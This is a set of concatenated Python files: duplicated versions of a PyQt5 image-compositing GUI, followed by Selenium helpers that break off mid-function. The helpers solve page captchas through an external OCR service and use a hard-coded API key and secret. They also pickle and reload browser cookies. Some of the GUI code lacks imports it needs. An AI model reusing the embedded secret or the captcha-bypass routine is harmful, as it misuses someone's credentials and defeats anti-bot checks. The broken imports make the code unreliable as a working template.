from PyQt5.QtCore import QMimeData, QPointF, Qt, QObject, pyqtSlot, QSize, QAbstractListModel, QRectF
from PyQt5.QtGui import QImage, QPixmap, QDrag, QPainter, QStandardItemModel, QIcon, QPen
from PyQt5.QtWidgets import (QApplication, QDialog, QFileDialog, QGridLayout,
QLabel, QPushButton, QWidget, QVBoxLayout, QListWidget, QAbstractItemView, QHBoxLayout,
QListView, QListWidgetItem, QMainWindow, QStackedWidget, QStackedLayout, QMenu, QMenuBar,
QAction, QSpacerItem, QSizePolicy, QSlider)
from crop import MainCropWindow
from cut import MainCutWindow
from image import ImgLabel
class MainQWidget(QWidget):
    """Central widget holding three stacked boards: the main compositing
    board (thumbnail list + image board), the crop window, and the cut
    window.  Only one board is visible at a time via QStackedLayout.

    NOTE(review): set_crop_mode/set_cut_mode reach into the module-global
    ``window`` (the running MainWindow) to resize the top-level window —
    this widget is not usable standalone.
    """
    def __init__(self, parent=None):
        super(MainQWidget, self).__init__(parent)
        # Stacked layout: index 0 = main board, 1 = crop window, 2 = cut window.
        self.layout = QStackedLayout(self)
        self.main_board = QWidget()
        self.crop_main_window = QMainWindow()
        self.cut_main_window = QMainWindow()
        self.main_board_layout = QHBoxLayout()
        self.main_board.setLayout(self.main_board_layout)
        # self.main_board.setFixedSize(1920, 1280)
        self.image_board = ImgLabel()
        # self.image_lists = QListWidget()
        self.image_lists = Gallery()
        # Stretch 1:2 — thumbnail list narrow, image board wide.
        self.main_board_layout.addWidget(self.image_lists, 1)
        self.main_board_layout.addWidget(self.image_board, 2)
        # self.crop_board = CropLabel()
        # self.crop_board.setAlignment(Qt.AlignCenter)
        self.crop_board = MainCropWindow()
        self.cut_board = MainCutWindow()
        # Toolbar under the cut board: eraser-size slider plus undo/redo.
        self.cut_board_bar = QWidget()
        cut_board_bar_layout = QHBoxLayout(self.cut_board_bar)
        self.cut_board_bar.setLayout(cut_board_bar_layout)
        self.cut_board_slider = QSlider(Qt.Horizontal)
        self.cut_board_slider.setValue(10)
        self.cut_board_slider.setMinimum(1)
        self.cut_board_bar_undo_button = QPushButton("undo")
        self.cut_board_bar_redo_button = QPushButton("redo")
        self.cut_board_bar_undo_button.clicked.connect(self.cut_board.eraseUndo)
        self.cut_board_bar_redo_button.clicked.connect(self.cut_board.eraseRedo)
        self.cut_board_slider.valueChanged.connect(self.cut_board_erase_resize)
        cut_board_bar_layout.addWidget(self.cut_board_slider)
        cut_board_bar_layout.addWidget(self.cut_board_bar_undo_button)
        cut_board_bar_layout.addWidget(self.cut_board_bar_redo_button)
        # self.cut_board = QWidget()
        # Cut window = cut board stacked over its toolbar.
        self.cut_window = QWidget()
        self.cut_layout = QVBoxLayout()
        # self.cut_board.setLayout(cut_layout)
        self.cut_window.setLayout(self.cut_layout)
        self.cut_layout.addWidget(self.cut_board, 0)
        self.cut_layout.addWidget(self.cut_board_bar, 1)
        self.crop_main_window.setCentralWidget(self.crop_board)
        self.cut_main_window.setCentralWidget(self.cut_window)
        # Crop menu: aspect-ratio entries are placeholders (no handler wired);
        # 'Done' returns to the main board and commits the crop.
        crop_menu = QMenuBar()
        crop_menu.addAction('Free')
        crop_menu.addAction('4:3')
        crop_menu.addAction('3:4')
        crop_menu.addAction('1:1')
        crop_menu.addAction('Done', lambda: self.set_crop_mode(False))
        cut_menu = QMenuBar()
        cut_menu.addAction('Cut', lambda: self.set_cut_repair(0))
        cut_menu.addAction('Repair', lambda: self.set_cut_repair(1))
        cut_menu.addAction('Clean', lambda: self.set_cut_repair(2))
        cut_menu.addAction('Done', lambda : self.set_cut_mode(False))
        self.crop_main_window.setMenuBar(crop_menu)
        self.cut_main_window.setMenuBar(cut_menu)
        self.layout.addWidget(self.main_board)
        self.layout.addWidget(self.crop_main_window)
        self.layout.addWidget(self.cut_main_window)
        self.layout.setCurrentWidget(self.main_board)
        # self.layout.setCurrentIndex(0)
        # Most recently loaded OpenCV image (BGR ndarray); set by MainWindow.addImage.
        self.img = None
    def set_cut_repair(self, mode):
        """Switch the cut board tool: 0 = cut, 1 = repair, 2 = clean-then-cut."""
        # cut
        if mode == 0:
            self.cut_board.mode = 0
        # repair
        elif mode == 1:
            self.cut_board.mode = 1
        # clean
        elif mode == 2:
            self.cut_board.clean()
            self.cut_board.mode = 0
    def set_crop_mode(self, mode, qPixmap=None):
        """Enter (mode=True, with the pixmap to crop) or leave (mode=False)
        the crop board; leaving hands the cropped image back to ``window``."""
        print('start cropping: {}'.format(mode))
        if mode:
            # Set crop Rect
            self.crop_board.setPixmap(qPixmap)
            # print(self.crop_board.sizeHint())
            # self.crop_main_window.setFixedSize(self.crop_board.sizeHint())
            # print(self.crop_main_window.size())
            window.setFixedSize(self.crop_main_window.sizeHint())
            # self.setFixedSize(self.crop_main_window.size())
            # self.layout.setCurrentIndex(1)
            self.layout.setCurrentWidget(self.crop_main_window)
            # print(123)
        else:
            print('SetCroppedImg')
            self.layout.setCurrentIndex(0)
            # TODO self.crop_board.scene.cropped_img FIXED SIZE
            window.setCroppedImg(self.crop_board.scene.cropped_img)
    def set_cut_mode(self, mode, img=None, imgEraseArea=None):
        """Enter (mode=True) or leave (mode=False) the cut board.

        On exit the edited erase area and cut image are written back to the
        image board's layer at ``selectedImgIndex`` and all fixed sizes are
        restored from the board pixmap.
        """
        if mode:
            print('start to cut')
            self.cut_board.initialize(img, imgEraseArea)
            # self.cut_board.setPixmap(qPixmap)
            print('self.cut_main_window.sizeHint(): {}'.format(self.cut_main_window.sizeHint()))
            # window.setFixedSize(self.cut_main_window.sizeHint())
            window.setFixedSize(self.cut_window.sizeHint())
            self.layout.setCurrentWidget(self.cut_main_window)
        else:
            # Persist the eraser strokes for this layer before switching back.
            self.image_board.imgLayerEraseArea[self.image_board.selectedImgIndex] = self.cut_board.scene.eraseArea[self.cut_board.scene.eraseAreaCurrentIndex]
            self.layout.setCurrentWidget(self.main_board)
            self.image_board.changeImg(self.cut_board.scene.cuttedImg, self.image_board.selectedImgIndex)
            w, h = self.image_board.pixmap().width(), self.image_board.pixmap().height()
            self.image_board.setFixedSize(w, h)
            self.image_lists.setFixedSize(window.image_list_width, h)
            window.setFixedSize(w + self.image_lists.width(), h)
    def cut_board_erase_resize(self, value):
        """Slider callback: set the cut board's eraser radius (pixels)."""
        self.cut_board.eraserRadius = value
        self.cut_board.update()
        print(value)
class Gallery(QListWidget):
    """Thumbnail list of image layers with internal drag-and-drop reordering.

    Row 0 is reserved for the background layer and is never a valid drop
    target; drops landing there are pushed down to row 1.  Reorders are
    mirrored into the image board via the module-global ``window``.
    """
    def __init__(self):
        super(Gallery, self).__init__()
        # Row of the most recently pressed item (drag source); -1 before any press.
        self.indexfrom = -1
        self.itemClicked.connect(self.getImg)
        self.itemPressed.connect(self.getIndex)
    def getIndex(self, item):
        """Record which row was pressed; used as the drag source row."""
        self.indexfrom = window.mainWindow.image_lists.indexFromItem(item).row()
        print('self.indexfrom: {}'.format(self.indexfrom))
    def dropEvent(self, e):
        """Accept an internal-move drop, then repair row 0 if needed and
        propagate the reorder to the image board's layer stack."""
        print('self.currentRow() in dropevent: {}'.format(self.currentRow()))
        if self.currentRow() > 0:
            super(Gallery, self).dropEvent(e)
        # force to 1
        if self.currentRow() == 0:
            # The dragged item displaced the background; move it back below row 0.
            print('force to 1')
            item = self.takeItem(0)
            print('self.count(): {}'.format(self.count()))
            self.insertItem(1, item)
            print('self.count(): {}'.format(self.count()))
            self.setCurrentRow(1)
            print('curRow: {}'.format(self.currentRow()))
            assert self.currentRow() == 1
        print('curRow: {}'.format(self.currentRow()))
        assert self.currentRow() > 0
        print('from -> to : {} -> {}'.format(self.indexfrom, self.currentRow()))
        if self.indexfrom != self.currentRow():
            window.mainWindow.image_board.reorder(self.indexfrom, self.currentRow())
    def getImg(self, item):
        """Click handler: select the corresponding layer on the image board."""
        window.mainWindow.image_board.selectImage(self.indexfrom)
    def addItem(self, item):
        # Thin pass-through; kept as an override hook for future bookkeeping.
        super(Gallery, self).addItem(item)
    def removeImg(self, index):
        """Remove the thumbnail at *index* (mirrors layer removal)."""
        print('index: {}'.format(index))
        item = self.takeItem(index)
        print(self.count())
class MainWindow(QMainWindow):
    """Top-level application window.

    Provides the menu-bar actions (set background, add/save image, transform
    modes, remove, cut) and hosts the stacked :class:`MainQWidget`.  A
    module-level instance is published as ``window`` and is reached back into
    by Gallery/MainQWidget for resizing callbacks.
    """

    def __init__(self):
        super(MainWindow, self).__init__()
        # Layout constants: thumbnail column width and initial board size.
        self.image_list_width = 256
        self.image_board_height = 1080
        self.image_board_width = 1920
        # MainWindow Size
        self.resize(QSize(self.image_board_width + self.image_list_width, self.image_board_height))
        button_list = QMenuBar()
        button_list.addAction('SetBackGround', self.setBackGround)
        button_list.addAction('AddImage', self.addImage)
        button_list.addAction('SaveImage', self.saveImage)
        button_list.addAction('ResizeMode', self.setresizeMode)
        button_list.addAction('MoveMode', self.setmoveMode)
        button_list.addAction('FlipMode', self.setflipMode)
        button_list.addAction('TurnMode', self.setturnMode)
        button_list.addAction('RemoveImage', self.removeImg)
        button_list.addAction('Cut', self.cutImg)
        self.setMenuBar(button_list)
        self.mainWindow = MainQWidget()
        self.setCentralWidget(self.mainWindow)
        # True once a background has been chosen; setCroppedImg then fixes the
        # board/list/window sizes to the board pixmap.
        # NOTE(review): never reset to False — presumably intentional; confirm.
        self.setBG = False

    def removeImg(self):
        """Delete the selected layer; index 0 (the background) is protected."""
        index = self.mainWindow.image_board.selectedImgIndex
        if index > 0:
            self.mainWindow.image_board.removeImg(index)
            self.mainWindow.image_lists.removeImg(index)

    def setBackGround(self):
        """Reset the board and thumbnail list, then load a background image."""
        self.mainWindow.image_lists.clear()
        self.mainWindow.image_lists.setViewMode(QListView.ListMode)
        self.mainWindow.image_lists.setDragDropMode(QAbstractItemView.InternalMove)
        self.mainWindow.image_board.initialize()
        self.setBG = True
        self.addImage()

    def addImage(self):
        """Pick an image from disk and open it in the crop board.

        The cropped result is delivered back via :meth:`setCroppedImg`.
        No-op if the dialog is cancelled or the file cannot be decoded.
        """
        filename, _ = QFileDialog.getOpenFileName(
            self, caption='Open Image', directory='./images', filter='*.png *.jpg *.bmp')
        # Fix: original used identity comparison (`filename is ''`), which is
        # implementation-dependent; an empty name means the dialog was cancelled.
        if not filename:
            return
        src = cv.imread(filename)
        if src is None:
            # Fix: cv.imread returns None on unreadable files instead of
            # raising; without this guard `.shape` below would crash.
            print('failed to read image: {}'.format(filename))
            return
        self.mainWindow.img = src
        # Wrap the BGR ndarray in a QImage (rgbSwapped converts BGR -> RGB).
        height, width, channel = self.mainWindow.img.shape
        bytesPerLine = 3 * width
        qImg = QImage(self.mainWindow.img.data, width, height, bytesPerLine,
                      QImage.Format_RGB888).rgbSwapped()
        qPixmap = QPixmap.fromImage(qImg)
        # TODO: resize adaptively instead of a fixed 720 px height.
        qPixmap = qPixmap.scaledToHeight(720)
        self.mainWindow.set_crop_mode(True, qPixmap)
        # TODO (translated): keep the main window size unchanged while the
        # crop window may vary; adding an image should neither resize the
        # window nor let the image exceed the background.

    def setCroppedImg(self, qPixmap):
        """Receive the cropped pixmap and append it as a new layer + thumbnail."""
        self.mainWindow.image_board.addPixmap(qPixmap)
        image_list_item = QListWidgetItem()
        icon = QIcon()
        icon.addPixmap(qPixmap, QIcon.Normal, QIcon.Off)
        image_list_item.setIcon(icon)
        self.mainWindow.image_lists.addItem(image_list_item)
        if self.setBG:
            # The board pixmap defines the fixed size of board, list and window.
            w, h = self.mainWindow.image_board.pixmap().width(), self.mainWindow.image_board.pixmap().height()
            print('w, h: ({}, {})'.format(w, h))
            self.mainWindow.image_board.setFixedSize(w, h)
            self.mainWindow.image_lists.setFixedSize(self.image_list_width, h)
            self.setFixedSize(w + self.mainWindow.image_lists.width(), h)

    def saveImage(self):
        """Save the composited board image; no-op if the dialog is cancelled."""
        print('Save Image')
        filename, _ = QFileDialog.getSaveFileName(
            self, caption='Save Image', directory='./images', filter='*.png *.jpg *.bmp')
        # Fix: guard added — QImage.save('') on a cancelled dialog silently fails.
        if not filename:
            return
        self.mainWindow.image_board.pixmap().toImage().save(filename)

    def setmoveMode(self):
        """Switch the image board to move mode (0)."""
        self.mainWindow.image_board.mode = 0
        self.mainWindow.image_board.update()

    def setresizeMode(self):
        """Switch the image board to resize mode (1)."""
        self.mainWindow.image_board.mode = 1
        self.mainWindow.image_board.update()

    def setflipMode(self):
        """Switch the image board to flip mode (2)."""
        self.mainWindow.image_board.mode = 2
        self.mainWindow.image_board.update()

    def setturnMode(self):
        """Switch the image board to turn (rotate) mode (3)."""
        self.mainWindow.image_board.mode = 3
        self.mainWindow.image_board.update()

    def cutImg(self):
        """Open the cut board for the selected layer (never the background)."""
        if self.mainWindow.image_board.selectedImgIndex > 0:
            print(self.mainWindow.image_board.imgLayerOrigin, self.mainWindow.image_board.imgLayerEraseArea)
            img = self.mainWindow.image_board.imgLayerOrigin[self.mainWindow.image_board.selectedImgIndex]
            imgEraseArea = self.mainWindow.image_board.imgLayerEraseArea[self.mainWindow.image_board.selectedImgIndex]
            self.mainWindow.set_cut_mode(True, img, imgEraseArea)
if __name__ == '__main__':
    # Standard Qt bootstrap.  `window` must stay module-global: Gallery and
    # MainQWidget reach back into it for resize/commit callbacks.
    app = QApplication(sys.argv)
    window = MainWindow()
    window.show()
    # Fix: removed dataset-extraction residue fused onto this line, and
    # propagate Qt's exit status to the shell instead of discarding it.
    sys.exit(app.exec_())
import cv2 as cv
from PyQt5.QtCore import QMimeData, QPointF, Qt, QObject, pyqtSlot, QSize, QAbstractListModel, QRectF
from PyQt5.QtGui import QImage, QPixmap, QDrag, QPainter, QStandardItemModel, QIcon, QPen
from PyQt5.QtWidgets import (QApplication, QDialog, QFileDialog, QGridLayout,
QLabel, QPushButton, QWidget, QVBoxLayout, QListWidget, QAbstractItemView, QHBoxLayout,
QListView, QListWidgetItem, QMainWindow, QStackedWidget, QStackedLayout, QMenu, QMenuBar,
QAction, QSpacerItem, QSizePolicy, QSlider)
from crop import MainCropWindow
from cut import MainCutWindow
from image import ImgLabel
class MainQWidget(QWidget):
    """Central widget: a QStackedLayout switching between three pages --
    the main composition board, the crop editor, and the cut/repair editor.

    NOTE(review): several methods reference the module-level global `window`
    (the MainWindow created under __main__) -- confirm before reusing this
    class outside this script.
    """
    def __init__(self, parent=None):
        super(MainQWidget, self).__init__(parent)
        # Stacked pages: main board / crop editor / cut editor.
        self.layout = QStackedLayout(self)
        self.main_board = QWidget()
        self.crop_main_window = QMainWindow()
        self.cut_main_window = QMainWindow()
        self.main_board_layout = QHBoxLayout()
        self.main_board.setLayout(self.main_board_layout)
        # self.main_board.setFixedSize(1920, 1280)
        self.image_board = ImgLabel()
        # self.image_lists = QListWidget()
        self.image_lists = Gallery()
        # Thumbnail list left (stretch 1), composition board right (stretch 2).
        self.main_board_layout.addWidget(self.image_lists, 1)
        self.main_board_layout.addWidget(self.image_board, 2)
        # self.crop_board = CropLabel()
        # self.crop_board.setAlignment(Qt.AlignCenter)
        self.crop_board = MainCropWindow()
        self.cut_board = MainCutWindow()
        # Toolbar under the cut editor: eraser-size slider plus undo/redo.
        self.cut_board_bar = QWidget()
        cut_board_bar_layout = QHBoxLayout(self.cut_board_bar)
        self.cut_board_bar.setLayout(cut_board_bar_layout)
        self.cut_board_slider = QSlider(Qt.Horizontal)
        self.cut_board_slider.setValue(10)
        self.cut_board_slider.setMinimum(1)
        self.cut_board_bar_undo_button = QPushButton("undo")
        self.cut_board_bar_redo_button = QPushButton("redo")
        self.cut_board_bar_undo_button.clicked.connect(self.cut_board.eraseUndo)
        self.cut_board_bar_redo_button.clicked.connect(self.cut_board.eraseRedo)
        self.cut_board_slider.valueChanged.connect(self.cut_board_erase_resize)
        cut_board_bar_layout.addWidget(self.cut_board_slider)
        cut_board_bar_layout.addWidget(self.cut_board_bar_undo_button)
        cut_board_bar_layout.addWidget(self.cut_board_bar_redo_button)
        # self.cut_board = QWidget()
        self.cut_window = QWidget()
        self.cut_layout = QVBoxLayout()
        # self.cut_board.setLayout(cut_layout)
        self.cut_window.setLayout(self.cut_layout)
        self.cut_layout.addWidget(self.cut_board, 0)
        self.cut_layout.addWidget(self.cut_board_bar, 1)
        self.crop_main_window.setCentralWidget(self.crop_board)
        self.cut_main_window.setCentralWidget(self.cut_window)
        # Menu bars for the two editor pages; 'Done' returns to the board.
        crop_menu = QMenuBar()
        crop_menu.addAction('Free')
        crop_menu.addAction('4:3')
        crop_menu.addAction('3:4')
        crop_menu.addAction('1:1')
        crop_menu.addAction('Done', lambda: self.set_crop_mode(False))
        cut_menu = QMenuBar()
        cut_menu.addAction('Cut', lambda: self.set_cut_repair(0))
        cut_menu.addAction('Repair', lambda: self.set_cut_repair(1))
        cut_menu.addAction('Clean', lambda: self.set_cut_repair(2))
        cut_menu.addAction('Done', lambda : self.set_cut_mode(False))
        self.crop_main_window.setMenuBar(crop_menu)
        self.cut_main_window.setMenuBar(cut_menu)
        self.layout.addWidget(self.main_board)
        self.layout.addWidget(self.crop_main_window)
        self.layout.addWidget(self.cut_main_window)
        self.layout.setCurrentWidget(self.main_board)
        # self.layout.setCurrentIndex(0)
        # Last raw OpenCV image loaded via MainWindow.addImage.
        self.img = None
    def set_cut_repair(self, mode):
        """Switch the cut editor tool: 0 = cut, 1 = repair, 2 = clean (reset)."""
        # cut
        if mode == 0:
            self.cut_board.mode = 0
        # repair
        elif mode == 1:
            self.cut_board.mode = 1
        # clean
        elif mode == 2:
            self.cut_board.clean()
            self.cut_board.mode = 0
    def set_crop_mode(self, mode, qPixmap=None):
        """Enter the crop page (mode=True, with the pixmap to crop) or leave
        it and hand the cropped image back to the main window."""
        print('start cropping: {}'.format(mode))
        if mode:
            # Set crop Rect
            self.crop_board.setPixmap(qPixmap)
            # print(self.crop_board.sizeHint())
            # self.crop_main_window.setFixedSize(self.crop_board.sizeHint())
            # print(self.crop_main_window.size())
            window.setFixedSize(self.crop_main_window.sizeHint())
            # self.setFixedSize(self.crop_main_window.size())
            # self.layout.setCurrentIndex(1)
            self.layout.setCurrentWidget(self.crop_main_window)
            # print(123)
        else:
            print('SetCroppedImg')
            self.layout.setCurrentIndex(0)
            # TODO self.crop_board.scene.cropped_img FIXED SIZE
            window.setCroppedImg(self.crop_board.scene.cropped_img)
    def set_cut_mode(self, mode, img=None, imgEraseArea=None):
        """Enter the cut page (mode=True); on leave, write the erase area and
        cut result back into the board's selected layer and restore geometry."""
        if mode:
            print('start to cut')
            self.cut_board.initialize(img, imgEraseArea)
            # self.cut_board.setPixmap(qPixmap)
            print('self.cut_main_window.sizeHint(): {}'.format(self.cut_main_window.sizeHint()))
            # window.setFixedSize(self.cut_main_window.sizeHint())
            window.setFixedSize(self.cut_window.sizeHint())
            self.layout.setCurrentWidget(self.cut_main_window)
        else:
            # Persist the editor's current erase area for the selected layer.
            self.image_board.imgLayerEraseArea[self.image_board.selectedImgIndex] = self.cut_board.scene.eraseArea[self.cut_board.scene.eraseAreaCurrentIndex]
            self.layout.setCurrentWidget(self.main_board)
            self.image_board.changeImg(self.cut_board.scene.cuttedImg, self.image_board.selectedImgIndex)
            # Restore the fixed window geometry of the main-board page.
            w, h = self.image_board.pixmap().width(), self.image_board.pixmap().height()
            self.image_board.setFixedSize(w, h)
            self.image_lists.setFixedSize(window.image_list_width, h)
            window.setFixedSize(w + self.image_lists.width(), h)
    def cut_board_erase_resize(self, value):
        """Slider callback: set the cut editor's eraser radius and repaint."""
        self.cut_board.eraserRadius = value
        self.cut_board.update()
        print(value)
class Gallery(QListWidget):
    """Sidebar list of layer thumbnails; drag-reordering a thumbnail reorders
    the corresponding layers on the image board.

    Row 0 is the background thumbnail and must stay first.
    NOTE(review): uses the module-level global `window` (the MainWindow).
    """
    def __init__(self):
        super(Gallery, self).__init__()
        # Row the current press/drag started from (-1 = none yet).
        self.indexfrom = -1
        self.itemClicked.connect(self.getImg)
        self.itemPressed.connect(self.getIndex)

    def getIndex(self, item):
        """Remember the row of the pressed item (drag source / clicked layer)."""
        self.indexfrom = window.mainWindow.image_lists.indexFromItem(item).row()
        print('self.indexfrom: {}'.format(self.indexfrom))

    def dropEvent(self, e):
        """Accept drops anywhere except row 0, then mirror the move on the board."""
        print('self.currentRow() in dropevent: {}'.format(self.currentRow()))
        if self.currentRow() > 0:
            super(Gallery, self).dropEvent(e)
        # If the item landed on row 0, push it down to row 1 so the background
        # thumbnail stays pinned at the top.
        if self.currentRow() == 0:
            print('force to 1')
            item = self.takeItem(0)
            print('self.count(): {}'.format(self.count()))
            self.insertItem(1, item)
            print('self.count(): {}'.format(self.count()))
            self.setCurrentRow(1)
            print('curRow: {}'.format(self.currentRow()))
            assert self.currentRow() == 1
            print('curRow: {}'.format(self.currentRow()))
        assert self.currentRow() > 0
        print('from -> to : {} -> {}'.format(self.indexfrom, self.currentRow()))
        if self.indexfrom != self.currentRow():
            window.mainWindow.image_board.reorder(self.indexfrom, self.currentRow())

    def getImg(self, item):
        """Select the clicked thumbnail's layer on the image board."""
        window.mainWindow.image_board.selectImage(self.indexfrom)

    # NOTE: the original also overrode addItem() with a body that only called
    # super(); the override added nothing and was removed -- the inherited
    # QListWidget.addItem behaves identically.

    def removeImg(self, index):
        """Drop the thumbnail at `index` from the list."""
        print('index: {}'.format(index))
        item = self.takeItem(index)
        print(self.count())
class MainWindow(QMainWindow):
    """Top-level window: a menu bar of editing actions around a MainQWidget."""

    def __init__(self):
        super(MainWindow, self).__init__()
        self.image_list_width = 256
        self.image_board_height = 1080
        self.image_board_width = 1920
        # MainWindow Size
        self.resize(QSize(self.image_board_width + self.image_list_width, self.image_board_height))
        button_list = QMenuBar()
        button_list.addAction('SetBackGround', self.setBackGround)
        button_list.addAction('AddImage', self.addImage)
        button_list.addAction('SaveImage', self.saveImage)
        button_list.addAction('ResizeMode', self.setresizeMode)
        button_list.addAction('MoveMode', self.setmoveMode)
        button_list.addAction('FlipMode', self.setflipMode)
        button_list.addAction('TurnMode', self.setturnMode)
        button_list.addAction('RemoveImage', self.removeImg)
        button_list.addAction('Cut', self.cutImg)
        self.setMenuBar(button_list)
        self.mainWindow = MainQWidget()
        self.setCentralWidget(self.mainWindow)
        # True while the next cropped image should become the background.
        self.setBG = False

    def removeImg(self):
        """Remove the selected layer (index 0 is the background and is kept)."""
        index = self.mainWindow.image_board.selectedImgIndex
        if index > 0:
            self.mainWindow.image_board.removeImg(index)
            self.mainWindow.image_lists.removeImg(index)

    def setBackGround(self):
        """Reset the board and thumbnail list, then load a background image."""
        self.mainWindow.image_lists.clear()
        self.mainWindow.image_lists.setViewMode(QListView.ListMode)
        self.mainWindow.image_lists.setDragDropMode(QAbstractItemView.InternalMove)
        self.mainWindow.image_board.initialize()
        self.setBG = True
        self.addImage()

    def addImage(self):
        """Open an image file and hand it to the crop editor."""
        filename, _ = QFileDialog.getOpenFileName(
            self, caption='Open Image', directory='./images', filter='*.png *.jpg *.bmp')
        # BUGFIX: was `filename is ''` -- identity comparison with a string
        # literal is implementation-dependent; test emptiness instead.
        if not filename:
            return
        src = cv.imread(filename)
        self.mainWindow.img = src
        # Wrap the BGR OpenCV buffer as a QImage (rgbSwapped converts to RGB).
        height, width, channel = self.mainWindow.img.shape
        bytesPerLine = 3 * width
        qImg = QImage(self.mainWindow.img.data, width, height, bytesPerLine,
                      QImage.Format_RGB888).rgbSwapped()
        qPixmap = QPixmap.fromImage(qImg)
        # TODO RESIZE IMAGE
        qPixmap = qPixmap.scaledToHeight(720)
        self.mainWindow.set_crop_mode(True, qPixmap)
        # TODO keep the main window size unchanged; only the crop window may resize.
        # TODO addImage should not resize the window nor exceed the background.

    def setCroppedImg(self, qPixmap):
        """Receive the cropped pixmap back from the crop editor as a new layer."""
        self.mainWindow.image_board.addPixmap(qPixmap)
        image_list_item = QListWidgetItem()
        icon = QIcon()
        icon.addPixmap(qPixmap, QIcon.Normal, QIcon.Off)
        image_list_item.setIcon(icon)
        self.mainWindow.image_lists.addItem(image_list_item)
        if self.setBG:
            # The background defines the fixed geometry of the whole window.
            w, h = self.mainWindow.image_board.pixmap().width(), self.mainWindow.image_board.pixmap().height()
            print('w, h: ({}, {})'.format(w, h))
            self.mainWindow.image_board.setFixedSize(w, h)
            self.mainWindow.image_lists.setFixedSize(self.image_list_width, h)
            self.setFixedSize(w + self.mainWindow.image_lists.width(), h)

    def saveImage(self):
        """Save the composed board image; no-op when the dialog is cancelled."""
        print('Save Image')
        filename, _ = QFileDialog.getSaveFileName(
            self, caption='Save Image', directory='./images', filter='*.png *.jpg *.bmp')
        if not filename:
            # BUGFIX: QImage.save('') fails silently on a cancelled dialog.
            return
        self.mainWindow.image_board.pixmap().toImage().save(filename)

    def _setMode(self, mode):
        # Shared body of the four mode-switching actions (was copy-pasted).
        self.mainWindow.image_board.mode = mode
        self.mainWindow.image_board.update()

    def setmoveMode(self):
        """Switch the image board to move mode (0)."""
        self._setMode(0)

    def setresizeMode(self):
        """Switch the image board to resize mode (1)."""
        self._setMode(1)

    def setflipMode(self):
        """Switch the image board to flip mode (2)."""
        self._setMode(2)

    def setturnMode(self):
        """Switch the image board to turn (rotate) mode (3)."""
        self._setMode(3)

    def cutImg(self):
        """Send the selected (non-background) layer to the cut/repair editor."""
        if self.mainWindow.image_board.selectedImgIndex > 0:
            print(self.mainWindow.image_board.imgLayerOrigin, self.mainWindow.image_board.imgLayerEraseArea)
            img = self.mainWindow.image_board.imgLayerOrigin[self.mainWindow.image_board.selectedImgIndex]
            imgEraseArea = self.mainWindow.image_board.imgLayerEraseArea[self.mainWindow.image_board.selectedImgIndex]
            self.mainWindow.set_cut_mode(True, img, imgEraseArea)
if __name__ == '__main__':
    # Entry point: build the Qt application and enter the event loop.
    # `window` must keep this name -- other classes read it as a global.
    app = QApplication(sys.argv)
    window = MainWindow()
    window.show()
    app.exec_()
import pickle
import random
import string
import time
from libs.ShowapiRequest import ShowapiRequest
from PIL import Image
import os
def get_logger():
    """Return the shared 'mylogger' logger, configured on first call.

    Handlers: a midnight-rotating file 'all.log' (7 backups, DEBUG+) and a
    plain 'error.log' file restricted to ERROR+.  BUGFIX: repeated calls used
    to attach duplicate handlers, duplicating every log record.
    """
    import logging
    import logging.handlers
    import datetime
    logger = logging.getLogger('mylogger')
    if logger.handlers:
        # Already configured -- do not stack another pair of handlers.
        return logger
    logger.setLevel(logging.DEBUG)
    rf_handler = logging.handlers.TimedRotatingFileHandler(
        'all.log', when='midnight', interval=1, backupCount=7,
        atTime=datetime.time(0, 0, 0, 0))
    rf_handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s"))
    f_handler = logging.FileHandler('error.log')
    f_handler.setLevel(logging.ERROR)
    f_handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(filename)s[:%(lineno)d] - %(message)s"))
    logger.addHandler(rf_handler)
    logger.addHandler(f_handler)
    return logger
def get_code(driver, id):
    """Screenshot the element `id`, crop the captcha out of the page
    screenshot, and OCR it through the showapi web service.

    Returns the recognized captcha text.
    """
    t = time.time()
    # os.path.join keeps this portable (the original hard-coded Windows
    # '\\' separators, which produced broken filenames on POSIX).
    path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'screenshots')
    picture_name1 = os.path.join(path, str(t) + '.png')
    driver.save_screenshot(picture_name1)
    ce = driver.find_element_by_id(id)
    left = ce.location['x']
    top = ce.location['y']
    right = ce.size['width'] + left
    height = ce.size['height'] + top
    # Hi-DPI pixel ratio: CSS pixels * dpr = physical screenshot pixels.
    dpr = driver.execute_script('return window.devicePixelRatio')
    print(dpr)
    im = Image.open(picture_name1)
    img = im.crop((left*dpr, top*dpr, right*dpr, height*dpr))
    t = time.time()
    picture_name2 = os.path.join(path, str(t) + '.png')
    img.save(picture_name2)  # this is the cropped captcha image
    # SECURITY NOTE(review): appId/secret are hard-coded in source; move them
    # to configuration or environment variables.
    r = ShowapiRequest("http://route.showapi.com/184-4", "290728", "1bd001f23c874581aac4db788a92c71d")
    r.addFilePara("image", picture_name2)
    r.addBodyPara("typeId", "34")
    r.addBodyPara("convert_to_jpg", "0")
    r.addBodyPara("needMorePrecise", "0")
    res = r.post()
    text = res.json()['showapi_res_body']
    code = text['Result']
    return code
# Generate a random string
def gen_random_str():
    """Return an 8-character random string of unique ASCII letters/digits."""
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.sample(alphabet, 8))
def save_cookie(driver, path):
    """Pickle the browser's current cookie list to `path`."""
    with open(path, 'wb') as out:
        cookie_list = driver.get_cookies()
        print(cookie_list)
        pickle.dump(cookie_list, out)
def load_cookie(driver, path):
    """Read pickled cookies from `path` and install them into the browser."""
    with open(path, 'rb') as src:
        for cookie in pickle.load(src):
            driver.add_cookie(cookie)

import pickle
import random
import string
import time
from libs.ShowapiRequest import ShowapiRequest
from PIL import Image
import os
def get_logger():
    """Return the shared 'mylogger' logger, configured on first call.

    BUGFIX: repeated calls used to attach duplicate handlers, so every
    record was logged multiple times.
    """
    import logging
    import logging.handlers
    import datetime
    logger = logging.getLogger('mylogger')
    if logger.handlers:
        # Already configured -- reuse as-is.
        return logger
    logger.setLevel(logging.DEBUG)
    # 'all.log' rotates at midnight, keeping 7 days of backups.
    rf_handler = logging.handlers.TimedRotatingFileHandler(
        'all.log', when='midnight', interval=1, backupCount=7,
        atTime=datetime.time(0, 0, 0, 0))
    rf_handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s"))
    # 'error.log' captures only ERROR and above, with file/line context.
    f_handler = logging.FileHandler('error.log')
    f_handler.setLevel(logging.ERROR)
    f_handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(filename)s[:%(lineno)d] - %(message)s"))
    logger.addHandler(rf_handler)
